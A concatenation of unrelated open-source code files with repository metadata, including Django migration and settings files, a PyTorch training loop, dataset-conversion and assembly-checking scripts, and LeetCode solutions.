mu = F.softplus(self.mu)
beta = F.softplus(self.beta)
betaN = beta * torch.arange(T).reshape(1, T).expand(N, T).to(beta) # (N, T)
loglik = mu * event_times - betaN # (N, T)
loglik = loglik.mul(input_mask).sum(-1) # (N,)
t0_i = t0.reshape(-1).expand(N)
N_i = torch.zeros(N).to(event_times)
compensator = torch.zeros(N).to(event_times)
for i in range(T):
t1_i = torch.where(input_mask[:, i].bool(), event_times[:, i], t0_i)
compensator = compensator + torch.exp(-beta * N_i) / mu * (torch.exp(mu * t1_i) - torch.exp(mu * t0_i))
t0_i = torch.where(input_mask[:, i].bool(), event_times[:, i], t0_i)
N_i = N_i + input_mask[:, i]
compensator = compensator + torch.exp(-beta * N_i) / mu * (torch.exp(mu * t1) - torch.exp(mu * t0_i))
return loglik - compensator # (N,)
def lowtri(A):
return torch.tril(A, diagonal=-1)
def fill_triu(A, value):
A = lowtri(A)
A = A + torch.triu(torch.ones_like(A)) * value
return A
| [
"ge67kun@tum.de"
] | ge67kun@tum.de |
16e7fdfef767ec7714498f24240a46a7136ba080 | d89b10564406795d15745c025db3a061c04e1d9a | /theblog/migrations/0026_auto_20210920_2031.py | fe62bf834b9dfc5a3b85be8ef97a70f50e8bb860 | [] | no_license | Karthik-SK12345/placement360 | 7eea948a907ad1988f5683374b11deed98acbc43 | 07a86c4bc113e7060f8f7fbbd634c32bb7fa88b0 | refs/heads/main | 2023-08-23T01:40:59.064011 | 2021-10-07T05:48:24 | 2021-10-07T05:48:24 | 414,471,756 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 742 | py | # Generated by Django 3.2.7 on 2021-09-20 15:01
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('theblog', '0025_remove_comment_name'),
]
operations = [
migrations.RenameField(
model_name='profile',
old_name='facebook_url',
new_name='email',
),
migrations.RenameField(
model_name='profile',
old_name='instagram_url',
new_name='linkedin_url',
),
migrations.RemoveField(
model_name='profile',
name='pinterest_url',
),
migrations.RemoveField(
model_name='profile',
name='twitter_url',
),
]
| [
"karthiks.cs19@bmsce.ac.in"
] | karthiks.cs19@bmsce.ac.in |
42b9a90f54d0ca07736c444a10588a8a3ec12c3a | 7cb68264f1ddd83ecd6c421dc01de6ac3748a117 | /.vscode/test/test16.py | 698ece78addbcef9c2de874e1f01afb7a65e8130 | [] | no_license | tyro-ops/Python1 | 2cc54e406d55ff73ced0a66da3d2459ae83edb49 | 1306686a0eda416aaa799e80009a1130eaa8c7d3 | refs/heads/master | 2022-05-24T12:52:52.598436 | 2020-04-25T12:38:14 | 2020-04-25T12:38:14 | 258,771,642 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 816 | py | import requests
import pprint
import csv
import json
from pathlib import Path
home = str(Path.home())
smd = home+'/Documents/Office/Automation/python1/.vscode/test/csv.csv'
print(smd)
url = 'https://randomuser.me/api/?results=1'
headers = {'authorization': "Basic API Key Ommitted",
'accept': "application/json", 'accept': "text/csv"}
users = requests.get(url, headers=headers).json()
pprint.pprint(users)
result = json.dumps(users)
f = open(home+'/Documents/Office/Automation/python1/.vscode/test/csv.csv', "w")
f.truncate(0)
f.write(result)
f.close()
f = open(home+'/Documents/Office/Automation/python1/.vscode/test/csv.xls', "w")
f.truncate(0)
f.write(result)
f.close()
with open(home+'/Documents/Office/Automation/python1/.vscode/test/test.json', 'w') as outfile:
json.dump(result, outfile)
| [
"yogesh.kalbhore@ril.com"
] | yogesh.kalbhore@ril.com |
311d126412fec77099c5dc7c1c9309b48d20436b | ba04312b06a1b6aa43dfb5a0ed9029cb9069814b | /Day 7/Q4.py | 0b1fb28b4a2f14d855c07970a5ce02db0b60a8c9 | [] | no_license | rishky1997/Python-Practice | c2ac154bd68b880e369d4ec3150650c53a9e615a | 8f651952af2223ded2b64dd3edc8c4d87095b15d | refs/heads/master | 2022-10-07T10:49:17.352237 | 2020-06-11T00:11:04 | 2020-06-11T00:11:04 | 266,185,251 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 133 | py | #4. Write a program to count how many reference variables in a program.
import sys
a=1111
b=1111
c=a
d=b
print(sys.getrefcount(a))
| [
"rishky1997@gmail.com"
] | rishky1997@gmail.com |
885520d72abf872038dadfba2490ecf178af6550 | f95415394db4c1b96021f06f86b0a1174cde77cf | /code/pose_estimation/train.py | 0428c4f420e2e8c5c400eba47756bbcb347511b4 | [] | no_license | pigunther/Intro2CV_project | 5fa4bb7a68a560d672567086359f99b49c3814fe | 003f57763e5788bfe28ff0654d1a34cb792a5b5b | refs/heads/master | 2020-10-01T13:40:46.763477 | 2019-12-19T14:20:52 | 2019-12-19T14:20:52 | 227,549,643 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,355 | py | import numpy as np
import torch
import ast
def train(train_loader, valid_loader, model, criterion, optimizer, device,
n_epochs=100, saved_model='model.pt'):
'''
Train the model
Args:
train_loader (DataLoader): DataLoader for train Dataset
valid_loader (DataLoader): DataLoader for valid Dataset
model (nn.Module): model to be trained on
criterion (torch.nn): loss funtion
optimizer (torch.optim): optimization algorithms
n_epochs (int): number of epochs to train the model
saved_model (str): file path for saving model
Return:
tuple of train_losses, valid_losses
'''
# initialize tracker for minimum validation loss
valid_loss_min = np.Inf # set initial "min" to infinity
train_losses = []
valid_losses = []
for epoch in range(n_epochs):
# monitor training loss
train_loss = 0.0
valid_loss = 0.0
###################
# train the model #
###################
model.train() # prep model for training
train_num = 0
for batch in train_loader:
# clear the gradients of all optimized variables
optimizer.zero_grad()
# forward pass: compute predicted outputs by passing inputs to the model
output = model(torch.DoubleTensor(string_to_list(batch['keypoints'])).to(device))
# print('output shape: ', output.shape)
# print('batch shape: ', batch['keypoints'].to(device).shape)
# return 1, 1
# calculate the loss
answer = torch.zeros(len(batch['answer']), 10)
for i, cl in enumerate(batch['answer']):
answer[i][int(cl[1:])] = 1.0
# print(output.shape, answer.shape)
loss = criterion(output.double(), answer.to(device).double())
# backward pass: compute gradient of the loss with respect to model parameters
loss.backward()
# perform a single optimization step (parameter update)
optimizer.step()
# update running training loss
train_loss += loss.item() * 10
# print('train step ', train_num)
train_num += 1
if train_num > 10:
break
######################
# validate the model #
######################
model.eval() # prep model for evaluation
train_num = 0
for batch in valid_loader:
# forward pass: compute predicted outputs by passing inputs to the model
output = model(torch.DoubleTensor(string_to_list(batch['keypoints'])).to(device))
# calculate the loss
answer = torch.zeros(len(batch['answer']), 10)
for i, cl in enumerate(batch['answer']):
answer[i][int(cl[1:])] = 1.0
loss = criterion(output.double(), answer.to(device).double())
# update running validation loss
valid_loss += loss.item() * 10
# print('val step ', train_num)
train_num += 1
if train_num > 10:
break
# print training/validation statistics
# calculate average Root Mean Square loss over an epoch
train_loss = np.sqrt(train_loss / len(train_loader.sampler.indices))
valid_loss = np.sqrt(valid_loss / len(valid_loader.sampler.indices))
train_losses.append(train_loss)
valid_losses.append(valid_loss)
print('Epoch: {} \tTraining Loss: {:.6f} \tValidation Loss: {:.6f}'
.format(epoch + 1, train_loss, valid_loss))
# save model if validation loss has decreased
if valid_loss <= valid_loss_min:
print('Validation loss decreased ({:.6f} --> {:.6f}). Saving model ...'
.format(valid_loss_min, valid_loss))
torch.save(model.state_dict(), saved_model)
valid_loss_min = valid_loss
print(answer, output)
return train_losses, valid_losses
def string_to_list(list_str):
for i in range(len(list_str)):
list_str[i] = list_str[i].replace('[', '').replace(']', '').replace('\n', '').replace(' ', ' ').split(' ')
list_str[i] = [int(s) for s in list_str[i]]
# lists = [int(s) for s in strs]
# print(list_str)
return list_str | [
"basimova.nf@phystech.edu"
] | basimova.nf@phystech.edu |
1d3ac756a8d4d9d98d12b0f26d31d37c374a57f3 | a2c1e50d606b3ed158a64edeeb5b1fc505841597 | /3주차_금요일_과제/practice1/accounts/urls.py | 88c671e1f053df9eef20562982ec1a51bb46f0ae | [] | no_license | genyeon9/piro11 | a492dabbaaded9ca865bd7f6a48f99480bffa004 | 4d37631f950f536c0220e0ad5e7eb62f073f4506 | refs/heads/master | 2022-11-30T00:57:43.157806 | 2019-07-23T08:38:53 | 2019-07-23T08:38:53 | 194,772,271 | 0 | 1 | null | 2022-11-04T05:05:12 | 2019-07-02T02:17:59 | Python | UTF-8 | Python | false | false | 126 | py | from django.urls import path
from . import views
app_name = 'accounts'
urlpatterns = [
path('profile/', views.profile)
]
| [
"kjh_5771@naver.com"
] | kjh_5771@naver.com |
e42c88dd6e5117097b5a733069f1a1a19d94832a | f8dd9e18e22f030844aa3f683eb2ee7f89a11595 | /EXPERIMENTS/prepare_l1.py | b75b15141fe7356a5006704250ca9ecfa7793e15 | [] | no_license | Why1221/MP-RW-LSH | aeac4bef80540f454f9b11f520f552689f2b26ff | 01620622071231a25fedf31e9b3722c04e970cae | refs/heads/main | 2023-06-22T07:14:35.154471 | 2021-07-23T23:12:34 | 2021-07-23T23:12:34 | 382,652,613 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,600 | py | #!/usr/bin/env python3
from enum import Enum
import sys
import struct
import numpy as np
import h5py
import os.path
import click
class Scale(Enum):
SMALL = 0
MEDIUM = 1
LARGE = 2
# DATASETS = {
# Scale.SMALL: ['audio', 'mnist', 'enron'],
# Scale.MEDIUM: ['glove', 'GIST1M', 'SIFT1M'],
# Scale.LARGE: ['GIST80M', "SIFT1B"]
# }
DATASET_INFO = {}
CUR_PATH = os.path.dirname(__file__)
def get_dim(h5filename):
name, _ = os.path.splitext(h5filename)
return int(name.split('-')[-1])
# def uint64_to_binary(num):
# return [float(c) for c in f"{num:0>64b}"]
def get_dsname(h5filename):
dsname, _, _ = h5filename.partition('-')
return dsname
def convert(h5filename, odir):
assert os.path.exists(odir)
print(f'Converting {h5filename} ...')
_, name = os.path.split(h5filename)
filename_prefix, _ = os.path.splitext(name)
# dsname = get_dsname(filename_prefix)
dim = get_dim(h5filename)
qn = -1
with h5py.File(h5filename, 'r') as inf:
train_fn = f"{odir}/{filename_prefix}-train.fvecs"
test_bfn = f"{odir}/{filename_prefix}-test.fvecs"
train_tfn = f"{odir}/{filename_prefix}-train.txt"
test_tfn = f"{odir}/{filename_prefix}-test.txt"
with open(train_fn, 'wb') as df:
with open(test_bfn, 'wb') as qf:
with open(train_tfn, 'w') as dtf:
with open(test_tfn, 'w') as qtf:
train = inf['train'][:]
n = (int)(train.shape[0] / dim)
print(f"#dim: {dim}, #points: {n}")
query = inf['test'][:]
qn = (int)(query.shape[0] / dim)
universe = max(np.max(train),np.max(query))
cnt = 0
for i in range(n):
df.write(struct.pack('i', dim))
point = train[(i * dim):((i+1) * dim)]
for val in point:
df.write(struct.pack('f', float(val)))
cnt += 1
bs = []
for j in range(dim):
bs.append(str(int(train[i*dim+j])))
sbs = " ".join(bs)
# it seems srs only accepts integer index
# oudf.write(f'{i + 1} {sbs}\n')
dtf.write(sbs + '\n')
# assert (cnt == n * dim)
cnt = 0
for i in range(qn):
qf.write(struct.pack('i', dim))
point = query[(i * dim):((i+1) * dim)]
for val in point:
qf.write(struct.pack('f', float(val)))
cnt += 1
qbs = []
for j in range(dim):
qbs.append(str(int(query[i*dim+j])))
sqbs = " ".join(qbs)
# it seems srs only accepts integer index
# oudf.write(f'{i + 1} {sbs}\n')
qtf.write(str(i) + ' ' + sqbs + '\n')
# assert (cnt == qn * dim)
return {
'train-b': os.path.split(train_fn)[-1],
'test-b': os.path.split(test_bfn)[-1],
'train-t':os.path.split(train_tfn)[-1],
'test-t':os.path.split(test_tfn)[-1],
'n': int(n),
'dimension': int(dim),
'qn': int(qn),
'dsh5': name,
'universe': int(universe)
}
def prepare_datasets():
ddir = os.path.join(CUR_PATH, 'datasets')
for f in os.listdir(ddir):
if f.endswith('.h5'):
dsname = get_dsname(f)
if os.path.exists(dsname):
print("directory already exists")
exit(1)
os.makedirs(dsname)
DATASET_INFO[dsname] = convert(os.path.join(ddir, f), dsname)
with open('datasets_info.json', 'w') as jf:
import json
json.dump(DATASET_INFO, jf, indent=4)
with open('dataset_info.txt', 'w') as tf:
# for ds, info in DATASET_INFO.items():
for ds in sorted(DATASET_INFO.keys(), key=lambda k: (DATASET_INFO[k]['n'], DATASET_INFO[k]['dimension'])):
info = DATASET_INFO[ds]
trainb = info['train-b']
testb = info['test-b']
traint = info['train-t']
testt = info['test-t']
n = info['n']
dim = info['dimension']
qn = info['qn']
dsh5 = info['dsh5']
universe = info['universe']
tf.write(f"{ds}%{trainb}%{testb}%{traint}%{testt}%{n}%{dim}%{qn}%{dsh5}%{universe}\n")
# CONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])
# @click.command(context_settings=CONTEXT_SETTINGS)
# @click.option('--no-large', default=True)
# def prepare(no_large):
# """Prepare datasets."""
# prepare_datasets()
# if not no_large:
# prepare_large_datasets()
if __name__ == '__main__':
prepare_datasets()
| [
"harrywhy12@gmail.com"
] | harrywhy12@gmail.com |
be0a4b0ae23f12893b303e8bc4cb504c7f517d0f | d0f11aa36b8c594a09aa06ff15080d508e2f294c | /leecode/1-500/1-100/39-组合总和.py | 751f2a332ffc2b86704c60a28303c9b7f6961e04 | [] | no_license | saycmily/vtk-and-python | 153c1fe9953fce685903f938e174d3719eada0f5 | 5045d7c44a5af5c16df5a3b72c157e9a2928a563 | refs/heads/master | 2023-01-28T14:02:59.970115 | 2021-04-28T09:03:32 | 2021-04-28T09:03:32 | 161,468,316 | 1 | 1 | null | 2023-01-12T05:59:39 | 2018-12-12T10:00:08 | Python | UTF-8 | Python | false | false | 572 | py | class Solution:
def combinationSum(self, candidates, target: int):
candidates.sort()
n = len(candidates)
res = []
def backtrack(tmp, tmp_sum=0, first=0):
if tmp_sum == target:
res.append(tmp.copy())
return
for j in range(first, n):
if tmp_sum + candidates[j] > target:
break
tmp.append(candidates[j])
backtrack(tmp, tmp_sum + candidates[j], j)
tmp.pop()
backtrack([])
return res
| [
"1786386686@qq.com"
] | 1786386686@qq.com |
652a4739f30fdafd785d25a2e440d57ef40fa1f3 | 163092f9f50bddb171da191958aa7866180a6fee | /utils/farcheck.py | c7cee57a384f95a9e21d9989ec148ace6f093e8c | [] | no_license | NekrobaDA/polishedcrystal | d7dd18f32886ee30a4c764c4ba78242f902f6aca | 6303b29258b72c19faa72e23d3380220d1d12daa | refs/heads/master | 2023-04-01T13:15:54.756614 | 2021-03-20T14:16:45 | 2021-03-20T14:16:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,250 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from glob import iglob
import sys
import re
sym_rx = re.compile(r'^([0-9A-F]{2}):([0-9A-F]{4}) ([A-Z0-9_\.#@]+)', re.IGNORECASE)
def_rx = re.compile(r'^\s*([A-Z_][A-Z0-9_\.#@]*):(?!\s*macro)', re.IGNORECASE)
ref_rx = re.compile(r'^\s+(?:call|jp|jr|dw|dwb)\s+(?:(?:z|nz|c|nc)\s*,\s*)?([A-Z0-9_\.]+)', re.IGNORECASE)
far_rx = re.compile(r'^\s+(?:farcall|farjp|callfar|callba|callab)\s+([A-Z0-9_\.]+)', re.IGNORECASE)
ram_rx = re.compile(r'^[vswh][A-Z]')
suppress = 'far-ok'
exclude = {
'data/text/unused_sweet_honey.asm',
'engine/games/memory_game.asm',
'gfx/pokemon/frame_pointers.asm',
'ram/wram0.asm',
'ram/wramx.asm',
}
if len(sys.argv) != 2:
print(f'Usage: {sys.argv[0]} polishedcrystal.sym', file=sys.stderr)
exit(1)
sym_banks = {}
with open(sys.argv[1], 'r') as f:
for line in f:
if (m := re.match(sym_rx, line)):
bank, addr, label = m.groups()
sym_banks[label] = int(bank, 16)
def get_label_bank(m, n=1):
label = m.group(n)
if label.startswith('.') and cur_label is not None:
label = cur_label + label
bank = sym_banks.get(label, None)
return (label, bank)
for filename in iglob('**/*.asm', recursive=True):
if filename in exclude:
continue
cur_label = None
cur_bank = None
with open(filename, 'r') as f:
for i, line in enumerate(f, 1):
if (m := re.match(def_rx, line)):
label, bank = get_label_bank(m)
cur_label = label
if bank is not None:
cur_bank = bank
else:
print(f"{filename}:{i}: cannot get bank of '{label}'", file=sys.stderr)
elif (m := re.match(ref_rx, line)):
label, bank = get_label_bank(m)
if bank is not None and bank != cur_bank and bank != 0 and not re.match(ram_rx, label):
code, *comment = line.split(';', 1)
code = code.strip()
comment = comment[0].strip() if comment else ''
if suppress not in comment:
print(f"{filename}:{i}: '{code}' in bank {cur_bank:02X} references '{label}' in bank {bank:02X}")
elif (m := re.match(far_rx, line)):
label, bank = get_label_bank(m)
if bank is not None and bank == cur_bank:
code = line.split(';', 1)[0].strip()
print(f"{filename}:{i}: '{code}' in bank {cur_bank:02X} references '{label}' already in bank {bank:02X}")
| [
"remy.oukaour+rangi42@gmail.com"
] | remy.oukaour+rangi42@gmail.com |
eb64e5d68a519e53d4e37ab1f2670f115f660766 | f02b21d5072cb66af643a7070cf0df4401229d6e | /leetcode/depth_first_search/695-max_area_of_island.py | 939a2da8c3ed73d926cf1e1b3a4173e9f7dc2bbb | [] | no_license | dbconfession78/interview_prep | af75699f191d47be1239d7f842456c68c92b95db | 7f9572fc6e72bcd3ef1a22b08db099e1d21a1943 | refs/heads/master | 2018-10-09T22:03:55.283172 | 2018-06-23T01:18:00 | 2018-06-23T01:18:00 | 110,733,251 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,673 | py | import sys
class Solution:
# def maxAreaOfIsland_PRACTICE(self, grid):
def maxAreaOfIsland(self, grid):
retval = 0
for i in range(len(grid)):
for j in range(len(grid[i])):
if grid[i][j] == 1:
retval = max(retval, self.helper(grid, i, j, 0))
return retval
def helper(self, grid, i, j, area):
if i < 0 or j < 0 or i > len(grid) - 1 or j > len(grid[i]) - 1 or grid[i][j] == 0:
return area
grid[i][j] = 0
area += 1
area = self.helper(grid, i, j + 1, area)
area = self.helper(grid, i + 1, j, area)
area = self.helper(grid, i, j - 1, area)
area = self.helper(grid, i - 1, j, area)
return area
def maxAreaOfIsland_PASSED(self, grid):
# def maxAreaOfIsland(self, grid):
"""
:type grid: List[List[int]]
:rtype: int
"""
big = 0
i = j = 0
while i < len(grid):
j = 0
while j < len(grid[i]):
if grid[i][j] == 1:
big = max(big, self.explore(grid, i, j))
j += 1
i += 1
return big
def explore(self, grid, i, j):
if i < 0 or i > len(grid) - 1 or j < 0 or j > len(grid[i]) - 1 or grid[i][j] == 0:
return 0
grid[i][j] = 0
count = 1
count += self.explore(grid, i, j + 1)
count += self.explore(grid, i, j - 1)
count += self.explore(grid, i - 1, j)
count += self.explore(grid, i + 1, j)
return count
def print_map(grid):
for row in grid:
for cell in row:
sys.stdout.write('{} '.format(cell))
print()
def main():
# 4
print(Solution().maxAreaOfIsland([
[1,1,0,0,0],
[1,1,0,0,0],
[0,0,0,1,1],
[0,0,0,1,1]
]))
# 3
print(Solution().maxAreaOfIsland([
[1, 1, 0, 1, 1],
[1, 0, 0, 0, 0],
[0, 0, 0, 0, 1],
[1, 1, 0, 1, 1]
]))
# 1
print(Solution().maxAreaOfIsland(([[1]])))
# 6
print(Solution().maxAreaOfIsland([
[0,0,1,0,0,0,0,1,0,0,0,0,0],
[0,0,0,0,0,0,0,1,1,1,0,0,0],
[0,1,1,0,1,0,0,0,0,0,0,0,0],
[0,1,0,0,1,1,0,0,1,0,1,0,0],
[0,1,0,0,1,1,0,0,1,1,1,0,0],
[0,0,0,0,0,0,0,0,0,0,1,0,0],
[0,0,0,0,0,0,0,1,1,1,0,0,0],
[0,0,0,0,0,0,0,1,1,0,0,0,0]]))
# LC Input
# [[1,1,0,0,0],[1,1,0,0,0],[0,0,0,1,1],[0,0,0,1,1]]
# [[1,1,0,1,1],[1,0,0,0,0],[0,0,0,0,1],[1,1,0,1,1]]
# [[1]]
# [[0,0,1,0,0,0,0,1,0,0,0,0,0],[0,0,0,0,0,0,0,1,1,1,0,0,0],[0,1,1,0,1,0,0,0,0,0,0,0,0],[0,1,0,0,1,1,0,0,1,0,1,0,0],[0,1,0,0,1,1,0,0,1,1,1,0,0],[0,0,0,0,0,0,0,0,0,0,1,0,0],[0,0,0,0,0,0,0,1,1,1,0,0,0],[0,0,0,0,0,0,0,1,1,0,0,0,0]]
if __name__ == '__main__':
main()
# Instructions
"""
Given a non-empty 2D array grid of 0's and 1's, an island is a group of 1's (representing land) connected 4-directionally (horizontal or vertical.) You may assume all four edges of the grid are surrounded by water.
Find the maximum area of an island in the given 2D array. (If there is no island, the maximum area is 0.)
Example 1:
[[0,0,1,0,0,0,0,1,0,0,0,0,0],
[0,0,0,0,0,0,0,1,1,1,0,0,0],
[0,1,1,0,1,0,0,0,0,0,0,0,0],
[0,1,0,0,1,1,0,0,1,0,1,0,0],
[0,1,0,0,1,1,0,0,1,1,1,0,0],
[0,0,0,0,0,0,0,0,0,0,1,0,0],
[0,0,0,0,0,0,0,1,1,1,0,0,0],
[0,0,0,0,0,0,0,1,1,0,0,0,0]]
Given the above grid, return 6. Note the answer is not 11, because the island must be connected 4-directionally.
Example 2:
[[0,0,0,0,0,0,0,0]]
Given the above grid, return 0.
Note: The length of each dimension in the given grid does not exceed 50.
""" | [
"Hyrenkosa1"
] | Hyrenkosa1 |
962190b9d499ff050a8f359e3e2ee888b8b5e6a6 | 0d6e4a3c482389bbd27dcd5a093e6e3efcb1ebc6 | /WebspamDetect/DataPreprocessAndJudge/TagArrayGenerator.py | e2e403eb707b6af6112ecc6476b8b72a6f624026 | [] | no_license | memjyh/DetectWebSpam | 22a80a614331f89740d7e0b381325dad84de4da0 | a598f2aab4617cdb6bea8e1b8474bf6f314110ca | refs/heads/master | 2020-12-30T09:05:10.175519 | 2020-02-15T10:13:11 | 2020-02-15T10:13:11 | 238,951,625 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,269 | py | # -*- coding: UTF-8 -*-
import os,sys
stdi,stdo,stde=sys.stdin,sys.stdout,sys.stderr
reload(sys)
sys.setdefaultencoding( "utf-8" )
sys.stdin,sys.stdout,sys.stderr=stdi,stdo,stde
parentdir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0,parentdir)
sys.path.insert(0,parentdir+"/Common")
def Generate(tagtree):
TagEnumFilePath = "../WebspamDetect/DetectModel/Tag.txt"
TagList = []
fo = open(TagEnumFilePath, "r")
while 1:
line = fo.readline()
if not line:
break
TagList.append(line.split("\n")[0].strip())
fo.close()
TagList.remove("")
TagList.remove("")
# TagList.remove("\r")
# TagList.remove("\r")
for t in TagList:
#print t
t=t[:-1]
#print t
#print TagList
TagNumber = len(TagList)
# print TagNumber
TagArray = [0 for n in range(TagNumber)]
tags = tagtree.split("-")
if "" in tags:
tags.remove("")
#print tags
for tag in tags:
if tag not in TagList:
continue
TagArray[TagList.index(tag)]=1
#print len(TagArray)
return TagArray
if __name__ == '__main__':
print len(Generate('a-article-b'))
| [
"543721511@qq.com"
] | 543721511@qq.com |
20801976b690a73e0d2e4df130659798771f135d | 629d9a97a0685b0c7af84f7ae63f13da04f577ed | /shop/migrations/0004_remove_product_stock.py | c7ad57af43ff7885de7cb8ab42c4eea8ad40149b | [] | no_license | vladborisov182/django_shop | e7127092178aee6d78ce7a5921e6b25998492b7c | b92de7ffaef983ccdb52f1573ad9f15ae97db1eb | refs/heads/master | 2021-05-13T12:55:21.428462 | 2020-03-30T09:44:28 | 2020-03-30T09:44:28 | 116,689,519 | 0 | 0 | null | 2020-03-30T09:43:05 | 2018-01-08T14:50:54 | Python | UTF-8 | Python | false | false | 390 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-01-09 16:37
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('shop', '0003_auto_20180109_1619'),
]
operations = [
migrations.RemoveField(
model_name='product',
name='stock',
),
]
| [
"vladborisov182@gmail.com"
] | vladborisov182@gmail.com |
99d4068cacbaa6f72d195e6e0a70cb6fa51744c2 | ef055588f88c39ebcef6f8e877cfefe3a8ecc158 | /movieapp/config/settings/base.py | 2ae637d3a2656f2b379393c337a82929904c35ea | [] | no_license | danjac/movieapp | 28dbfaa60e28d0ea8b2f6007e71dacaf5e057acc | 2a41c80fbbc36e838bfa5a7938a2513b0fcdc29c | refs/heads/master | 2023-02-09T02:14:11.063681 | 2020-12-26T11:09:46 | 2020-12-26T11:09:46 | 320,833,342 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,195 | py | # Standard Library
import pathlib
import socket
from email.utils import getaddresses
# Django
from django.contrib import messages
# Third Party Libraries
import environ
env = environ.Env()
DEBUG = False
BASE_DIR = pathlib.Path("/app")
SECRET_KEY = env("SECRET_KEY")
DATABASES = {
"default": env.db(),
}
REDIS_URL = env("REDIS_URL")
CACHES = {"default": env.cache("REDIS_URL")}
EMAIL_HOST = env("EMAIL_HOST", default="localhost")
EMAIL_PORT = env.int("EMAIL_PORT", default=25)
EMAIL_BACKEND = "djcelery_email.backends.CeleryEmailBackend"
ATOMIC_REQUESTS = True
ALLOWED_HOSTS = env.list("ALLOWED_HOSTS", default=[])
# configure internal IPS inside docker container
INTERNAL_IPS = [
ip[:-1] + "1" for ip in socket.gethostbyname_ex(socket.gethostname())[2]
]
ADMINS = getaddresses(env.list("ADMINS", default=[]))
SESSION_COOKIE_DOMAIN = env("SESSION_COOKIE_DOMAIN", default=None)
CSRF_COOKIE_DOMAIN = env("CSRF_COOKIE_DOMAIN", default=None)
CSRF_TRUSTED_ORIGINS = env.list("CSRF_TRUSTED_ORIGINS", default=[])
ROOT_URLCONF = "movieapp.config.urls"
WSGI_APPLICATION = "movieapp.config.wsgi.application"
LOCAL_APPS = [
"movieapp.actors.apps.ActorsConfig",
"movieapp.movies.apps.MoviesConfig",
"movieapp.tv_shows.apps.TvShowsConfig",
"movieapp.users.apps.UsersConfig",
]
INSTALLED_APPS = [
"django.forms",
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.sites",
"django.contrib.messages",
"django.contrib.postgres",
"django.contrib.staticfiles",
"allauth",
"allauth.account",
"allauth.socialaccount",
"allauth.socialaccount.providers.google",
"django_extensions",
"djcelery_email",
"widget_tweaks",
] + LOCAL_APPS
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"django.contrib.sites.middleware.CurrentSiteMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.locale.LocaleMiddleware",
"movieapp.common.middleware.turbolinks.TurbolinksMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.middleware.gzip.GZipMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
"movieapp.common.middleware.http.HttpResponseNotAllowedMiddleware",
]
DEFAULT_PAGE_SIZE = 12
# base Django admin URL (should be something obscure in production)
ADMIN_URL = env("ADMIN_URL", default="admin/")
# auth
AUTH_USER_MODEL = "users.User"
# https://docs.djangoproject.com/en/dev/ref/settings/#authentication-backends
AUTHENTICATION_BACKENDS = [
"django.contrib.auth.backends.ModelBackend",
"allauth.account.auth_backends.AuthenticationBackend",
]
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator" # noqa
},
{"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator"},
{"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator"},
{"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator"},
]
HOME_URL = LOGIN_REDIRECT_URL = "/"
LOGIN_URL = "account_login"
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = "username_email"
SOCIALACCOUNT_PROVIDERS = {
"google": {
"SCOPE": ["profile", "email",],
"AUTH_PARAMS": {"access_type": "online",},
}
}
SOCIALACCOUNT_ADAPTER = "movieapp.users.adapters.SocialAccountAdapter"
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = "en"
LANGUAGES = [
("en", "English (US)"),
("en-gb", "English (GB)"),
]
LANGUAGE_COOKIE_DOMAIN = env("LANGUAGE_COOKIE_DOMAIN", default=None)
LANGUAGE_COOKIE_SAMESITE = "Lax"
LOCALE_PATHS = [BASE_DIR / "i18n"]
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# https://docs.djangoproject.com/en/1.11/ref/forms/renderers/
FORM_RENDERER = "django.forms.renderers.TemplatesSetting"
# https://docs.djangoproject.com/en/3.0/ref/contrib/messages/
MESSAGE_TAGS = {
messages.DEBUG: "message-debug",
messages.INFO: "message-info",
messages.SUCCESS: "message-success",
messages.WARNING: "message-warning",
messages.ERROR: "message-error",
}
# https://celery.readthedocs.io/en/latest/userguide/configuration.html
result_backend = CELERY_BROKER_URL = REDIS_URL
result_serializer = "json"
# https://django-taggit.readthedocs.io/en/latest/getting_started.html
MEDIA_URL = env("MEDIA_URL", default="/media/")
STATIC_URL = env("STATIC_URL", default="/static/")
MEDIA_ROOT = BASE_DIR / "media"
STATICFILES_DIRS = [BASE_DIR / "static"]
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [BASE_DIR / "templates"],
"APP_DIRS": True,
"OPTIONS": {
"debug": False,
"builtins": [],
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.template.context_processors.i18n",
"django.template.context_processors.media",
"django.template.context_processors.static",
"django.template.context_processors.tz",
"django.contrib.messages.context_processors.messages",
],
"libraries": {"pagination": "movieapp.common.pagination.templatetags"},
},
}
]
LOGGING = {
"version": 1,
"disable_existing_loggers": False,
"handlers": {
"console": {"class": "logging.StreamHandler"},
